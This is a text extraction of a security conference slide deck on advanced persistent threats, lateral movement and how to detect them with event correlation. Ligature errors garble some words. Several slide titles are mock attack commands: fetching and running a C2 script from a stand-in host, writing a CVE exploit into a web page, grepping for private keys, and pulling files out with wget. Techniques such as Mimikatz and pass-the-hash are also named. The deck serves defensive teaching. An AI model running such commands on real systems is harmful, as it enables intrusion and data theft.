advanced threats and lateral movement detection
TRANSCRIPT
Advanced Threats & Lateral Movement Detec5on Greg Foss OSCP, GAWN, GPEN, GWAPT, GCIH, CEH Sr. Security Research Engineer LogRhythm Labs
# whoami
• Greg Foss • Sr. Security Researcher • LogRhythm Labs – Threat Intel Team • Former DOE PenetraEon Tester • Focus => Honeypots, Incident Response, and Red Team • OSCP, GAWN, GPEN, GWAPT, GCIH, CEH, etc…
2
# ls -‐lha
IT Security Threats
Event CorrelaEon
DetecEon
DEMO!
1
2
3
4
3
4
# man [Advanced Threats]
• Advanced Persistent Threats • Organized Cyber Crime • Hack5vists • ‘Cyber Terrorists’ • Etc…
• Able to develop and uElize sophisEcated techniques in pursuit of their target objecEve from reconnaissance to data exfiltraEon.
• Will leverage the full spectrum of aWack vectors – social, technical, physical, etc.
• Highly organized, highly moEvated, highly resourced.
• Willing to invest significant Eme and resources to compromise.
5
It’s when, not if…
• Mission Oriented
• Persistent an Driven
• PaEent and Methodical
• Focus on exponenEal ROI
• Emphasis on high IP value targets
• They will get in…
6 Image: hWp://pos^iles10.naver.net/20120823_137/ahranta1_1345681933371Je4vd_JPEG/Target.jpg
Iden5fy a ‘Hacker’
7
Ok, for real…
• *Simple… Correlate on odd network / host ac5vity • Use the data at hand to acEvely detect anomalies • Understand how your organizaEon will respond to a breach /
outage / squirrel affecEng any of the three InfoSec pillars • Confiden5ality • Integrity • Availability
8
Advanced Threat Tac5cs and Evasion
• Threat actors of all types move slowly and quietly over Eme. LimiEng exposure and potenEal for discovery.
• Trending on enterprise data over Eme helps to build baselines that can be used to ac5vely iden5fy anomalies.
9
IT Security Threats
10
# last && echo ‘How are they geYng in??’
• Phishing • 91% of ‘advanced’ aWacks began with a phishing email or
similar social engineering tacEcs. • hWp://www.infosecurity-‐magazine.com/view/29562/91-‐of-‐apt-‐aWacks-‐
start-‐with-‐a-‐spearphishing-‐email/
• 2014 Metrics • Average cost per breach => $3.5 million • 15% Higher than the previous year
• hWp://www.ponemon.org/blog/ponemon-‐insEtute-‐releases-‐2014-‐cost-‐of-‐data-‐breach-‐global-‐analysis
11
# last && echo ‘How are they geYng in??’
• Phishing • 91% of ‘advanced’ aWacks began with a phishing email or
similar social engineering tacEcs. • hWp://www.infosecurity-‐magazine.com/view/29562/91-‐of-‐apt-‐aWacks-‐
start-‐with-‐a-‐spearphishing-‐email/
• 2014 Metrics • Average cost per breach => $3.5 million • 15% Higher than the previous year
• hWp://www.ponemon.org/blog/ponemon-‐insEtute-‐releases-‐2014-‐cost-‐of-‐data-‐breach-‐global-‐analysis
12
# history | more
• It only takes one…
13
# ./searchsploit ‘client side’ && echo ‘new exploits daily!’
14
# cat [cve-‐2014-‐6332] >> /var/www/pwn-‐IE.html
15
Event Correla5on & Detec5on
16
Defense in Depth
17
Spear Phishing
18
Phishing Aback Log Traces
19
$ vim next.sh
• Maintain Access…
20 Image: hWp://www.netresec.com/images/back_door_open_300x200.png
$ ./next.sh
• Then?
• *Nothing…
• For a long Eme… • *not really*
• They have aWained a foothold and are now your newest employees…
21
$ su -‐ root
22
# wget hbp://bad.stuff.net/c2.py . && ./c2.py
• Once infected, the beachhead will beacon periodically
23
Behavioral Analy5cs
• Beaconing Ac5vity – Usually iniEated over port 443 or an encrypted tunnel over port 80.
• Can be detected with a Firewall or Web Proxy • Capability to decrypt SSL traffic is a huge plus
• Behavioral analy5cs can be uElized to differenEate normal browsing acEvity from possible evidence of an infected host. • Using a SIEM, track the unique websites usually visited, and the overall
volume of normal web acEvity, on a per user and a per host basis. • Watch for significant changes over an extended period of Eme.
24
Reconnaissance
• Ping sweeps, service discovery, etc. – NO
• Why make unnecessary noise?
• Instead => access network shares, web apps, and services
• Passively gather informaEon using available resources…
25 Image: hWp://macheads101.com/pages/pics/download_pics/mac/portscan.png
Lateral Movement
• Dump Local System Hashes • Maybe crack them, maybe it’s not even necessary…
• Pass the Hash (PtH)
• Dump plain text passwords • Mimikatz -‐-‐ FTW!
• Act as an internal employee -‐-‐ use legiEmate means to access resources.
26
Uncovering Internal Reconnaissance and Pivo5ng • Security OperaEons Goal => Reduce MTTD and MTTR
• MTTD – Mean Time to Detect • MTTR – Mean Time to Respond
• Set Traps => Honeypot / Honey Token access
• Overt Clues => ModificaEon of user / file / group permissions and pivoEng evidence
• Subtle Clues => VPN access from disparate geographical locaEons
• Missed Opportuni5es => Once inside, they are now an ‘employee’…
27
Lateral Movement Log Traces
• Microsos’s granular Event IdenEficaEon schema (EVID) in conjuncEon with environment informaEon provides analysts with plenty of informaEon to track aWackers once they have breached the perimeter.
28
Passive Data Extrac5on
• Well Poisoning via UNC Paths
• SMB Replay
• Help Desk Tickets
• Responder – By Spider Labs
• Keylogging
29
Passive Traffic Analysis
• Analyze / capture anything that comes across the wire.
• ARP poison hosts of interest, take over switches/routers, etc.
30 Image: hWps://i.chzbgr.com/maxW500/5579525376/h7D009AE4/
# grep –rhi ‘private key’ /* && echo “Iden5fy Key Resources”
• Keys / CerEficates / Passwords • File Shares and Databases
• Intellectual Property
• Domain Controllers / Exchange / etc.
• Business Leaders – CXO, Director, VP, etc. • AdministraEve Assistants
31 Image: hWp://www.mobilemarkeEngwatch.com/wordpress/wp-‐content/uploads/2011/07/Top-‐Secret-‐Tip-‐To-‐Pick-‐SMS-‐Keyword.jpeg
# wget hbp://target/files.tgz && echo “Data Exfiltra5on”
• Target data idenEfied, gathered, and moved out of the environment.
• Data is normally leaked in a ‘hidden’ or modified format, rarely is the actual document extracted.
• Emails and Employee PII
• Intellectual Property
• Trade Secrets
32 Image: hWp://www.csee.umbc.edu/wp-‐content/uploads/2013/04/ex.jpg
Data Exfiltra5on is Open Not ‘Advanced’
33
Catching Data Exfiltra5on
• Granular restric5ons on sensi5ve files and directories to specific groups or individuals, alert on any abnormal file access / read / write / etc.
• DNS exfiltra5on or someEmes even ICMP Tunneling in high security environments
• Non-‐SSL over ports 443 / 8443, encrypted TCP over ports 80 / 8080
• Abnormal web server ac5vity, newly created files, etc.
34
It all comes down to Event Correla5on
35
DEMO
36
DEMO
Closing Thoughts…
• Don’t be hard on the outside, sos and chewy on the inside…
• Implement Layer 3 (network) SegmentaEon and Least User Privilege
• Understand your environment and log data so that you can accurately correlate physical and cyber events
• Implement URL filtering, stateful packet inspecEon, and binary analysis
• AcEvely alert on and respond at the earliest signs of lateral movement and reconnaissance observed within your environment
• The earlier you can detect aWackers the beWer…
37
Thank You!
38
QUESTIONS?
Greg Foss
OSCP, GAWN, GPEN, GWAPT, GCIH, CEH Senior Security Research Engineer
Greg.Foss[at]logrhythm.com @heinzarelli